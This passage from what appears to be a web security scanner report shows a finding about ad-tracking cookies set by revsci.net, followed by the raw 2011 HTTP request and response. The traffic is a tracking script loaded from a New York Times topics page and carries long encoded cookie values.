DeImvl0HvUKKUH0c5CuIOuYj++ndShBAZ+VNnjwxB2Mls95HN1angPB/wUS5ZA7oAowT9YrRn8Ln2KEiOFCtpTn66FGH2Xt2i2PV8ZDulNK4pEWyDXrRteaDJW/5aHnMJIcb1vj+mEDSuHgnKwA6JX1o27KM0pVx65T4XvzUOiI7DRvS7e1ctVNvz+jXHi42K6hzDGIRw5XaOphYObGUJ1qpJTQS1rYB8J/ySLf6Rb3npkMkxpD0Xcj0dHhCkdVmWe1xyxSjKbx7qeXO3y3Dj3beo6ykQefVpf1qApCSpnc/0jwm0q/Uk3aT4lHQaGqCZ9+VMafIxqWtqmeQ0eLHr4/0EWFEc8SrzkU0si8We3f8x6iDXI5GbyQtlyQ+SHtNDjPq4TU+L8S7Bct2MQQriXOnQs14xt6Zro7DdeyPHLHALFVabl1zIW2Vt9tS3MEGwrAOLRbR9Oq3Xkl4TsLJmLZ3T/xHv2Xy/N9ZN4jzr9+cEnmn+YmaES+ffnbKEqInseIDnTzuge+M2y4H18oACMTDttvkYywBq4Ro2rG3EZm11dTObBMVAWGJqx1QBbG+4VeF0n8DPKnqL2wWEmde7X0z48hPbbiUGs+JLPX4LHPXg+5GgvNdy6hJ7rgD6ozXNLDB5QP/BRSez1hmRFaDAKUqEWGH3fc2e2Kmq7D4tvQ5aJRqiLPCDCzWFTBFa9Z6SLqebu2S0sW4TQcDS97cOZsBQeGT1I3O4/jiJ8td2GhV/IdY/WJe/wKVY8sZTo9viiEnTG/VlF4UUSEXbMQA7DAmknpB1pOUibL1wPcEY4U+P083l7PpTbOoBsL9UoRhBa/kY9Ej92EL6H1kofpm4jKCut9UquS1iZqIp2XKY0RbN8rLrJ75ibJxYy1gutyy3DCxI92XiXUNO0AIH6gVWJuvqiwqbyPBGWNjWlSG6ZsOCN/vMG/pX1f6c96WsijiN1c/752hExZPlCgZLG9jzW4W7WuDQusLheAPxJqAaTYo7nuqnJlaN4R9gg4RuICN2aBaOGE60cmb0d5qTNpt61BeMrT4mjmOTIAjGIkqmGBCMC3UD/ck2PW+QlWMRHra2aWDT4LVBagOaAYe37bO54CW5/80ch3mg6YHpFqedtep+uLFqWQNl/i8b0GdI1Z6Uk4Bi2RLXlhSLmttoae9hl1SK3vmGziXDkSX1Gx3+9fGc3L7W1SUKdBth+dLZ0GXOeeh0mR9WbBNS/kMGtlfCOQvTUNYVp8wlcDo8jwvPwp5fk1oUD3BICmAAtiJlaE2N/x6IzLTCwuqUPchBxFCoWhxAX3m4wlaFMOKQlpQUj7UxJcoPly0Gq4Gc2YqNzchQGiER9pt+KgVJyZz8O5kiIfgCL+/0QF5EIawzjyBTGzXzelvyBOJjVRO2W2DjmuF6WEm/UyyIbQUvl1/DeSdA3uUDpKHYNEOaOGjmcEU+BWFp4hdCYHt9z0OLjQK+sKqp5pJbtYimG2dFhTJq4DGRnTfCXJsoY2/UfqlsxeKNLF3Rc307OR8nsjNvCarJ1FDAuu5+DpVHWOdzutF2zSEvIUDbXcwWiu1XaWy/+e/lCHHCN+7hHYqoFfvCl/KLp4PFtwqwCWdfaKOqeFBEmTYvqY0e0=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/71896167.js?D=DM_LOC%3Dhttp%253A%252F%252Ftopics.nytimes.com%252Ftopics%252Freference%252Ftimestopics%252Fsubjects%252Fp%252Fprivate_equity%252Findex.html%253Finline%253Dnyt-classifier%26DM_CAT%3DNYTimesglobal%2520%253E%2520Times%2520Topics%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gq+ml3T51epqLBQmL8IGbY2gQ4O3XYKvnesHJskvAjloepK631i+WEhUmrGkG9POIzi7inp/3S9t0/IkxBMjdPeK2r1xOnBR+A8KgmFzpR3pMg5V0STXRc5h/sA2NQ8SJlLg63pEKsg0LhGp0RYFkzNMODTshm1erra5gejvuagU2d8qI8ZLWb3uplY2tI/Vm/9cX9omRRy0syaq0l8Nr+TF6aZTxZx2CCsCqWg+0DKfxkTGPK39huZg4KIwOCJ80nGUjZBpf3916lDkUrfRsAPU8dNsvHJnE+CGrFmK78bzSClA2d7nO3mZ4Tph6/X622tft3S2FiJvxpnCmKKfsD6CkME6V/br58gGXWNbGm3Egg1d62rpTVHYS3zZbWSfXf8Ikbnyw3DeyLy9jQNNX1KUKbivSROVMa+hF+zKT/waoCZ19qAYNTw7Z+ayZxvx/C4L9+sRcCFeEUVtGn5W23UQsZvMZpRvHPHGvi9KVOgzOei7UTzuvUrprEbpNpWKZAHx16xSVr7Gozt/rKPxVU2WLffiZzsfplA/+QQ0toP9fGqoAZVtxFkZf9bzJss9X1eSlN87cHsirwXt8j2CcwfzhgrEDrrWcWYZrljcH4OYHTvMxCaLI3g0uL7gi4N0E/kHzsPvncOCO1GW/5Vsg2e3Fy05VDyEdlbQ/8Mjkt+5ydUkd34ajOZ7HY+1YDfruXt4sZqA5ORK8IDddeRnVVZseMKmQ0NBFR+3qCFM8NKuGE2u0N/NIm0RGB9tSW/FDeQHEg1dvu3CQQky0=; rtc_Uh1H=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Uh1H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5OKmrgd3gbbjWobvkn1IXjnlu1LNJ9d4JolLatzGnQTLW0czBX79HxWvrpYxsDITCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadaV+PrsMX5NHgYvwPC5gr3Yt2y4CuwWsFZGNb3+plg+HE3zp9eW9A0fom4BiGY4s/G+Uwj6jX05Gl0Qb4rT+TEQk0Q7B9QZZ+lu3RJU3VgQGczhMSaKNrfE5RhrcghAxB/dxrxrGWb7yoqjCXYPgAFPnXybJE07o5ZvmunP1yxWgnOTs+Lp191ypAB+cu3wXMeWrEwZKB8YUlyEeFKlYq/5OiFPisDl6Pq7gbgu9ny1a2vN7mnU/D2s/dZDDyJi4vAVUTHNc/6KyEjrKhOqJr02DQ1eIBBo4c8qk5J42uboOq7ZTwHGjle1if9lmnJrWLswxPXzGWSxeYyS+X/wZb7iiVez1yQif50PjUrppERBb2Nwi4ozEc1oqpYkSui73c8ekn0F3f4J7nsue2TMg80ybtwr5GquG4CyNacrQeoG6+zSw2jlwxR63jfJucJVOtpwvNsv3/vCFZA8SlIa/By5Pi1ol/O1t73I6hYCDLAkh5a5gSJN8bOhcV7Cy1pDAdtLXCd14KZ6b49A0HII1WAMGx8NGSr4HBi+OokZjnabBEtrWICoGrQy3BTU7Cn0budshyY1UXCv38UT9DuZGC6wNYCZRxnPGzuYlihI38INQbEBwsTZhQnloZ9pXNVA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
Set-Cookie: rtc_CFSh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:16:13 GMT
Content-Length: 1089

